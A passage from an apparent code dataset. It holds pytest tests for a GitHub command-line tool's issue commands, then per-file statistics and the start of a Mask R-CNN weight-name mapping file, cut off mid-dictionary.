the virtues of `attrs`](https://glyph.twistedmatrix.com/2016/08/attrs.html) written by the author of [Twisted](https://twistedmatrix.com/trac/).\\r\\n\\r\\n## What's the difference between this Python project and similar ones?\\r\\n\\r\\nThe only other project like this that I'm aware of is [`characteristic`](https://github.com/hynek/characteristic), which the author abandoned to create `attrs` instead.\\r\\n\\r\\n--\\r\\n\\r\\nAnyone who agrees with this pull request could vote for it by adding a :+1: to it, and usually, the maintainer will merge it when votes reach **20**.",
"closed_at": null,
"closed_by": null,
"comments": 2,
"created_at": "2017-04-15T23:59:11Z",
"html_url": "https://github.com/vinta/awesome-python/pull/875",
"id": 221980315,
"labels": [],
"locked": false,
"milestone": null,
"number": 875,
"reactions": {
"+1": 10
},
"state": "open",
"title": "Add attrs",
"updated_at": "2017-05-20T23:16:50Z",
"url": "https://api.github.com/repos/vinta/awesome-python/issues/875",
"user": "jwodder"
}
]
'''
ISSUE_COMMENTS = '''\
[
{
"body": "I do not currently have any plans for supporting plugins, and any such plans would be very far down on my to-do list for this project.\\n",
"created_at": "2017-06-29T16:31:32Z",
"html_url": "https://github.com/jwodder/ghutil/issues/1#issuecomment-312021247",
"id": 312021247,
"reactions": {},
"updated_at": "2017-06-29T16:31:32Z",
"url": "https://api.github.com/repos/jwodder/ghutil/issues/comments/312021247",
"user": "jwodder"
}
]
'''
def test_issue_comments_issue(cmd):
r = cmd('issue', 'comments', 'ghutil/1')
assert r.exit_code == 0
assert r.output == ISSUE_COMMENTS
def test_pr_comments_issue(cmd):
r = cmd('pr', 'comments', 'ghutil/1')
assert r.exit_code == 0
assert r.output == ISSUE_COMMENTS
def test_issue_open(cmd):
issues = ['jwodder/test/1', 'test/2']
r = cmd('issue', 'open', *issues)
assert r.exit_code == 0
assert r.output == ''
for i in issues:
r = cmd('issue', 'show', '-v', i)
assert r.exit_code == 0
assert json.loads(r.output)[0]["state"] == "open"
def test_issue_close(cmd):
issues = ['jwodder/test/1', 'test/2']
r = cmd('issue', 'close', *issues)
assert r.exit_code == 0
assert r.output == ''
for i in issues:
r = cmd('issue', 'show', '-v', i)
assert r.exit_code == 0
assert json.loads(r.output)[0]["state"] == "closed"
def test_issue_lock(cmd):
issues = ['jwodder/test/1', 'test/2']
r = cmd('issue', 'lock', *issues)
assert r.exit_code == 0
assert r.output == ''
for i in issues:
r = cmd('issue', 'show', '-v', i)
assert r.exit_code == 0
assert json.loads(r.output)[0]["locked"]
def test_issue_unlock(cmd):
issues = ['jwodder/test/1', 'test/2']
r = cmd('issue', 'unlock', *issues)
assert r.exit_code == 0
assert r.output == ''
for i in issues:
r = cmd('issue', 'show', '-v', i)
assert r.exit_code == 0
assert not json.loads(r.output)[0]["locked"]
def test_issue_edit_one_assignee(cmd):
r = cmd('--debug', 'issue', 'edit', '--assignee', 'jwodder', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": [
"jwodder"
]
}
'''
def test_issue_edit_nil_assignee(cmd):
r = cmd('--debug', 'issue', 'edit', '--assignee', '', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": []
}
'''
def test_issue_edit_one_label(cmd):
r = cmd('--debug', 'issue', 'edit', '--label', 'invalid', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"labels": [
"invalid"
]
}
'''
def test_issue_edit_nil_label(cmd):
r = cmd('--debug', 'issue', 'edit', '--label', '', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"labels": []
}
'''
def test_issue_edit_two_labels(cmd):
r = cmd('--debug', 'issue', 'edit', '--label', 'invalid', '-lhelp wanted', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"labels": [
"invalid",
"help wanted"
]
}
'''
def test_issue_edit_milestone(cmd):
r = cmd('--debug', 'issue', 'edit', '--milestone', 'v1.0', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
GET https://api.github.com/repos/jwodder/test/milestones?state=all
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"milestone": 1
}
'''
def test_issue_edit_int_milestone(cmd):
r = cmd(
'--debug',
'issue', 'edit',
'--milestone', 'https://github.com/jwodder/test/milestone/1',
'jwodder/test/1'
)
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"milestone": 1
}
'''
def test_issue_edit_nil_milestone(cmd):
r = cmd('--debug', 'issue', 'edit', '--milestone', '', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"milestone": null
}
'''
def test_issue_edit_title(cmd):
r = cmd('--debug', 'issue', 'edit', '--title', 'API test site', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"title": "API test site"
}
'''
def test_issue_edit_nil_title(cmd):
r = cmd('--debug', 'issue', 'edit', '--title', '', 'jwodder/test/1')
assert r.exit_code != 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"title": ""
}
422 Client Error: Unprocessable Entity for URL: https://api.github.com/repos/jwodder/test/issues/1
{
"documentation_url": "https://developer.github.com/v3/issues/#edit-an-issue",
"errors": [
{
"code": "missing_field",
"field": "title",
"resource": "Issue"
}
],
"message": "Validation Failed"
}
'''
def test_issue_edit_body(cmd):
r = cmd('--debug', 'issue', 'edit', '--body', str(FILEDIR/'life.py'), 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"body": "from collections import Counter\\n\\ndef life(before):\\n \\\"\\\"\\\"\\n Takes as input a state of Conway's Game of Life, represented as an iterable\\n of ``(int, int)`` pairs giving the coordinates of living cells, and returns\\n a `set` of ``(int, int)`` pairs representing the next state\\n \\\"\\\"\\\"\\n before = set(before)\\n neighbors = Counter(\\n (x+i, y+j) for (x,y) in before\\n for i in [-1,0,1]\\n for j in [-1,0,1]\\n if (i,j) != (0,0)\\n )\\n return {xy for (xy, n) in neighbors.items()\\n if n == 3 or (n == 2 and xy in before)}\\n"
}
'''
def test_issue_edit_body_devnull(cmd):
r = cmd('--debug', 'issue', 'edit', '--body', os.devnull, 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"body": ""
}
'''
def test_issue_edit_open(cmd):
r = cmd('--debug', 'issue', 'edit', '--open', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"state": "open"
}
'''
def test_issue_edit_closed(cmd):
r = cmd('--debug', 'issue', 'edit', '--closed', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"state": "closed"
}
'''
def test_issue_edit_open_close(cmd):
r = cmd('--debug', 'issue', 'edit', '--open', '--close', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"state": "closed"
}
'''
ISSUE_EDIT_MSG = 'Title: Test issue\n' \
'Labels: \n' \
'Assignees: \n' \
'Milestone: \n' \
'Open: yes\n' \
'\n' \
'Here be testing.\n'
def test_issue_edit_nosave(cmd, mocker):
mocker.patch('click.edit', return_value=None)
r = cmd('--debug', 'issue', 'edit', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
GET https://api.github.com/repos/jwodder/test
No modifications made; exiting
'''
click.edit.assert_called_once_with(ISSUE_EDIT_MSG, require_save=True)
def test_issue_edit_nochange(cmd, mocker):
mocker.patch('click.edit', return_value=ISSUE_EDIT_MSG)
r = cmd('--debug', 'issue', 'edit', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
GET https://api.github.com/repos/jwodder/test
No modifications made; exiting
'''
click.edit.assert_called_once_with(ISSUE_EDIT_MSG, require_save=True)
def test_issue_edit_change_everything(cmd, mocker):
mocker.patch(
'click.edit',
return_value='Title: Tests at work\n'
'Labels: help wanted, enhancement\n'
'Assignees: jwodder\n'
'Milestone: v1.0\n'
'Open: false\n'
'\n'
'Once upon a time, there was a little unit test.'
' He failed, and the project was cancelled before anyone'
' could figure out why.'
' The end.\n'
)
r = cmd('--debug', 'issue', 'edit', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test/issues/1
GET https://api.github.com/repos/jwodder/test
GET https://api.github.com/repos/jwodder/test/milestones?state=all
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": [
"jwodder"
],
"body": "Once upon a time, there was a little unit test. He failed, and the project was cancelled before anyone could figure out why. The end.\\n",
"labels": [
"help wanted",
"enhancement"
],
"milestone": 1,
"state": "closed",
"title": "Tests at work"
}
'''
click.edit.assert_called_once_with(ISSUE_EDIT_MSG, require_save=True)
def test_issue_label_add(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert json.loads(r.output)[0]["labels"] == ['enhancement']
r = cmd('--debug', 'issue', 'label', 'jwodder/test/1', 'invalid','question')
assert r.exit_code == 0
assert r.output == '''\
POST https://api.github.com/repos/jwodder/test/issues/1/labels
[
"invalid",
"question"
]
'''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'invalid', 'question']
def test_issue_label_add_redundant(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'invalid', 'question']
r = cmd('--debug', 'issue', 'label', 'jwodder/test/1', 'invalid', 'wontfix')
assert r.exit_code == 0
assert r.output == '''\
POST https://api.github.com/repos/jwodder/test/issues/1/labels
[
"invalid",
"wontfix"
]
'''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'invalid', 'question', 'wontfix']
def test_issue_label_add_nothing(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'question']
r = cmd('--debug', 'issue', 'label', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
POST https://api.github.com/repos/jwodder/test/issues/1/labels
[]
'''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'question']
def test_issue_label_delete(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'invalid', 'question', 'wontfix']
r = cmd('--debug', 'issue', 'label', '--delete', 'jwodder/test/1',
'invalid', 'wontfix')
assert r.exit_code == 0
assert r.output == '''\
DELETE https://api.github.com/repos/jwodder/test/issues/1/labels/invalid
DELETE https://api.github.com/repos/jwodder/test/issues/1/labels/wontfix
'''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'question']
def test_issue_label_delete_nothing(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'question']
r = cmd('--debug', 'issue', 'label', '--delete', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == ''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'question']
def test_issue_label_set(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'question']
r = cmd('--debug', 'issue', 'label', '--set', 'jwodder/test/1',
'invalid', 'enhancement')
assert r.exit_code == 0
assert r.output == '''\
PUT https://api.github.com/repos/jwodder/test/issues/1/labels
[
"invalid",
"enhancement"
]
'''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'invalid']
def test_issue_label_set_nothing(cmd):
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert sorted(json.loads(r.output)[0]["labels"]) == \
['enhancement', 'invalid']
r = cmd('--debug', 'issue', 'label', '--set', 'jwodder/test/1')
assert r.exit_code == 0
assert r.output == '''\
PUT https://api.github.com/repos/jwodder/test/issues/1/labels
[]
'''
r = cmd('issue', 'show', 'jwodder/test/1')
assert r.exit_code == 0
assert json.loads(r.output)[0]["labels"] == []
def test_issue_label_delete_set_nothing(nullcmd):
r = nullcmd(
'issue', 'label', '--delete', '--set', 'jwodder/test/1', 'bug',
standalone_mode=False,
)
assert r.exit_code != 0
assert isinstance(r.exception, click.UsageError)
assert str(r.exception) == '--delete and --set are mutually exclusive'
@pytest.mark.usefixtures('test_repo')
def test_issue_new(cmd):
r = cmd(
'--debug',
'issue', 'new',
'-TThing is broken',
'--body', str(FILEDIR/'lorem.txt'),
)
assert r.exit_code == 0
assert r.output == '''\
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/1",
"id": 363631533,
"labels": [],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/1",
"user": "jwodder"
}
'''
@pytest.mark.usefixtures('test_repo')
def test_issue_new_edit_body(cmd, mocker):
HEADERS = 'Title: Thing is broken\n' \
'Labels: \n' \
'Assignees: \n' \
'Milestone: \n'
mocker.patch('click.edit', return_value=HEADERS + '\n' + LOREM)
r = cmd('--debug', 'issue', 'new', '-TThing is broken')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/1",
"id": 363631533,
"labels": [],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/1",
"user": "jwodder"
}
'''
click.edit.assert_called_once_with(HEADERS+'\n', require_save=True)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_edit_title(cmd, mocker):
HEADERS = 'Title: Thing is broken\n' \
'Labels: \n' \
'Assignees: \n' \
'Milestone: \n'
mocker.patch('click.edit', return_value=HEADERS + '\n' + LOREM)
r = cmd('--debug', 'issue', 'new', '--body', str(FILEDIR/'lorem.txt'))
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\\n",
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/1",
"id": 363631533,
"labels": [],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/1",
"user": "jwodder"
}
'''
click.edit.assert_called_once_with(
'Title: \nLabels: \nAssignees: \nMilestone: \n\n' + LOREM,
require_save=True,
)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_edit_title_no_body(cmd, mocker):
EDIT = 'Title: \nLabels: \nAssignees: \nMilestone: \n\n'
mocker.patch('click.edit', return_value='Title: Thing is broken\n')
r = cmd('--debug', 'issue', 'new')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
POST https://api.github.com/repos/jwodder/test/issues
{
"assignees": [],
"labels": [],
"title": "Thing is broken"
}
{
"assignees": [],
"body": null,
"closed_at": null,
"closed_by": null,
"comments": 0,
"created_at": "2018-09-25T15:16:57Z",
"html_url": "https://github.com/jwodder/test/issues/2",
"id": 363631539,
"labels": [],
"locked": false,
"milestone": null,
"number": 2,
"reactions": {},
"state": "open",
"title": "Thing is broken",
"updated_at": "2018-09-25T15:16:57Z",
"url": "https://api.github.com/repos/jwodder/test/issues/2",
"user": "jwodder"
}
'''
click.edit.assert_called_once_with(EDIT, require_save=True)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_no_title_no_body(cmd, mocker):
EDIT = 'Title: \nLabels: \nAssignees: \nMilestone: \n\n'
mocker.patch('click.edit', return_value=EDIT)
r = cmd('--debug', 'issue', 'new')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
Aborting issue due to empty title
'''
click.edit.assert_called_once_with(EDIT, require_save=True)
@pytest.mark.usefixtures('test_repo')
def test_issue_new_no_name_no_body_no_save(cmd, mocker):
EDIT = 'Title: \nLabels: \nAssignees: \nMilestone: \n\n'
mocker.patch('click.edit', return_value=None)
r = cmd('--debug', 'issue', 'new')
assert r.exit_code == 0
assert r.output == '''\
GET https://api.github.com/repos/jwodder/test
No changes saved; exiting
'''
click.edit.assert_called_once_with(EDIT, require_save=True)
def test_issue_assign(cmd):
r = cmd('--debug', 'issue', 'assign', 'jwodder/test/1', 'jwodder')
assert r.exit_code == 0
assert r.output == '''\
POST https://api.github.com/repos/jwodder/test/issues/1/assignees
{
"assignees": [
"jwodder"
]
}
'''
def test_issue_assign_delete(cmd):
r = cmd('--debug', 'issue', 'assign', '-d', 'jwodder/test/1', 'jwodder')
assert r.exit_code == 0
assert r.output == '''\
DELETE https://api.github.com/repos/jwodder/test/issues/1/assignees
{
"assignees": [
"jwodder"
]
}
'''
def test_issue_assign_set(cmd):
r = cmd('--debug', 'issue', 'assign', '--set', 'jwodder/test/1', 'jwodder')
assert r.exit_code == 0
assert r.output == '''\
PATCH https://api.github.com/repos/jwodder/test/issues/1
{
"assignees": [
"jwodder"
]
}
'''
def test_issue_assign_delete_set(nullcmd):
r = nullcmd(
'issue', 'assign', '-d', '--set', 'jwodder/test/1', 'jwodder',
standalone_mode=False,
)
assert r.exit_code != 0
assert isinstance(r.exception, click.UsageError)
assert str(r.exception) == '--delete and --set are mutually exclusive'
def test_issue_web_issue(cmd, mocker):
mocker.patch('webbrowser.open_new')
r = cmd('--debug', 'issue', 'web', 'ghutil/1')
assert r.exit_code == 0, r.output
assert r.output == '''\
GET https://api.github.com/user
GET https://api.github.com/repos/jwodder/ghutil/issues/1
'''
webbrowser.open_new.assert_called_once_with(
'https://github.com/jwodder/ghutil/issues/1'
)
# issue new
# - milestones
# - editor invoked and you don't have push permission
# - explicit repository on command line
# issue edit - two assignees
# creating/editing an issue on a repository you don't have push access to
# issue search
# issue assign: no assignees given
| 37.96788 | 1,870 | 0.637697 | 5,110 | 35,462 | 4.343053 | 0.123483 | 0.038481 | 0.035191 | 0.047988 | 0.811517 | 0.761366 | 0.73753 | 0.711756 | 0.691299 | 0.666562 | 0 | 0.03029 | 0.194715 | 35,462 | 933 | 1,871 | 38.008574 | 0.746822 | 0.007247 | 0 | 0.550948 | 0 | 0.047393 | 0.671497 | 0.030344 | 0 | 0 | 0 | 0 | 0.18128 | 1 | 0.062796 | false | 0 | 0.009479 | 0 | 0.072275 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f1d83562fa7fbf68ca05b326335d51706d5b1ecf | 43,645 | py | Python | DeepLearningExamples/TensorFlow2/Segmentation/MaskRCNN/mrcnn_tf2/runtime/weights_mapping.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow2/Segmentation/MaskRCNN/mrcnn_tf2/runtime/weights_mapping.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | DeepLearningExamples/TensorFlow2/Segmentation/MaskRCNN/mrcnn_tf2/runtime/weights_mapping.py | puririshi98/benchmark | 79f554f1e1cf36f62994c78e0e6e5b360f554022 | [
"BSD-3-Clause"
] | null | null | null | """ Custom mapping that maps model backbone to weights from NVIDIA ResNet50 v1.5 checkpoint. """
# pylint: disable=line-too-long
WEIGHTS_MAPPING = {
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/beta': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/gamma': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/moving_mean': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/batch_normalization_2/moving_variance': 'resnet50/btlnck_block_0_0/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_1/conv2d_2/kernel': 'resnet50/btlnck_block_0_0/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/beta': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/gamma': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/moving_mean': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/batch_normalization_3/moving_variance': 'resnet50/btlnck_block_0_0/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_2/conv2d_3/kernel': 'resnet50/btlnck_block_0_0/bottleneck_2/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/beta': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/gamma': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/moving_mean': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/batch_normalization_4/moving_variance': 'resnet50/btlnck_block_0_0/bottleneck_3/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/conv2d_block_3/conv2d_4/kernel': 'resnet50/btlnck_block_0_0/bottleneck_3/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/beta': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/gamma': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/moving_mean': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/batch_normalization_1/moving_variance': 'resnet50/btlnck_block_0_0/shortcut/conv2d/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block/shortcut/conv2d_1/kernel': 'resnet50/btlnck_block_0_0/shortcut/conv2d/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/beta': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/gamma': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/moving_mean': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/batch_normalization_5/moving_variance': 'resnet50/btlnck_block_0_1/bottleneck_1/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_4/conv2d_5/kernel': 'resnet50/btlnck_block_0_1/bottleneck_1/conv2d/kernel',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/beta': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/beta',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/gamma': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/gamma',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/moving_mean': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/moving_mean',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/batch_normalization_6/moving_variance': 'resnet50/btlnck_block_0_1/bottleneck_2/BatchNorm/moving_variance',
'mrcnn/resnet50/bottleneck_group/bottleneck_block_1/conv2d_block_5/conv2d_6/kernel': 'resnet50/btlnck_block_0_1/bottleneck_2/conv2d/kernel',
